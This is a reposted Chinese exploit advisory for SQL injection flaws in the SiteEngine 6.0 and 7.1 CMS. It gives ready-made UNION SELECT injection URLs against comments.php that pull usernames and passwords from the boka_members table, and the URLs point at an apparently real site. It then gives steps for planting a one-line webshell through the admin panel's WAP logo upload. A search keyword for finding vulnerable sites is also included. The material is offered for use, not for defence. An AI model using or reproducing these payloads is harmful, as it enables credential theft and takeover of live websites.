SiteEngine 6.0&71. SQLInjection

SiteEngine SQL注入漏洞分析
本文分析了SiteEngine6.0及7.1版本中由于评论功能开启导致的SQL注入漏洞,提供了具体的漏洞利用方式及获取Shell的方法。

#############################################################################
#标题:   SiteEngine 6.0 SQL注入漏洞
#日期:    2010-11-25
#作者: Beach
#Team:    www.linux520.com
#厂商: www.siteengine.net www.boka.cn
#关键字:    “Powered by SiteEngine”   //300,000 +~
#############################################################################
[*]描述:
   利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:

http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, … ,24,25,26+from+boka_members%23

#############################################################################
[*]上Shell:

管理后台: http://server/admin/
系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
确定—>马上浏览—>看图片属性即为一句话地址

#############################################################################

#############################################################################
#标题:   SiteEngine 7.1 SQL注入漏洞
#日期:    2010-11-25
#作者:    Beach
#Team:    www.linux520.com
#厂商:    www.siteengine.net www.boka.cn
#关键字:    “Powered by SiteEngine”   //300,000 +~
#############################################################################
[*]描述:
   利用这个漏洞需要评论功能开启,默认开启
#############################################################################
[*]利用:

企业门户版本:
[1]http://www.nhs8.com/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,…,38,39+from+boka_members%23

[2]http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,…,26,27+from+boka_members%23

可能字段数不一样, 自己尝试
==============================================================================
电子商务版本:

[+]http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,…,37,38+from+boka_members%23
#############################################################################

其他版本类似
#############################################################################
[*]上Shell:

管理后台: http://server/admin/
系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
确定—>马上浏览—>看图片属性即为一句话地址
#############################################################################



















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/432814,如需转载请自行联系原作者

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值